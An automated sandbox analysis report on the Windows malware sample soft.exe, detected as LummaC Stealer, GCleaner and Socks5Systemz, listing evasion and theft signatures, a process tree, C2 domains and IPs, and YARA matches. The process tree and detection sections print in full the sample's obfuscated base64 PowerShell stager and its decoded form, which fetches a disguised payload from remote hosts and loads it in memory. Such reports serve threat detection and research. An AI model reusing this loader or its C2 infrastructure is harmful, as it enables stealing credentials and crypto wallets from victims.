
Windows Analysis Report
soft.exe

Overview

General Information

Sample name: soft.exe
Analysis ID: 1626993
MD5: c0d0b27ce5688d1912b5acfa788d08a2
SHA1: 26e5e763ba5e7d58eb4663c3ae186f548ca16919
SHA256: 1d0577799b61bc0f500c5438ebbdf0a22ad8f69411380037cb8c9a9eb029c57f
Tags: de-pumped, exe, user-abuse_ch

Detection

GCleaner, LummaC Stealer, Socks5Systemz
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected GCleaner
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Socks5Systemz
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file has a writeable .text section
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • svchost.exe (PID: 4832 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 432 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • sppsvc.exe (PID: 5360 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 3796 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5352 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • soft.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\soft.exe" MD5: C0D0B27CE5688D1912B5ACFA788D08A2)
    • BitLockerToGo.exe (PID: 6828 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • N7LnRW81Rfq.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" MD5: 1CB8DD3607684387ABD3B28876FE1808)
        • N7LnRW81Rfq.tmp (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" MD5: B7B82CFA8450995363936BF8AA65FEE6)
          • ssdtoolbox.exe (PID: 2236 cmdline: "C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe" -i MD5: CF8CD18A8C39163D0529175BBB6A7F45)
      • MnzBi21FK.exe (PID: 2500 cmdline: "C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe" MD5: 3C570A5E7BA82EEA698EC56EC3427A2C)
        • cmd.exe (PID: 2908 cmdline: cmd.exe /c 67c2163c9db39.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 2352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • powershell.exe (PID: 5924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM
@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw
@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@ZwBu@HI@YwBr@Gs@a@@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@Mg@x@DE@Lg@2@DI@Mg@u@D@@Ng@u@DI@Ng@v@C8@Og@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBN@HM@YgB1@Gk@b@Bk@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
                • MSBuild.exe (PID: 4600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • svchost.exe (PID: 4536 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 6420 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
{"C2 url": ["starrynsightsky.icu", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life"], "Build id": "tqqheo--"}
{"C2 addresses": ["45.91.200.135", "185.156.73.73"]}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
Source | Rule | Description | Author | Strings
23.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
5.2.soft.exe.9e18000.1.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
5.2.soft.exe.9f2c000.3.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
5.2.soft.exe.a122000.6.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
5.2.soft.exe.9f00000.5.raw.unpack | JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security |
Source | Rule | Description | Author | Strings
amsi64_4704.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

Spreading

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@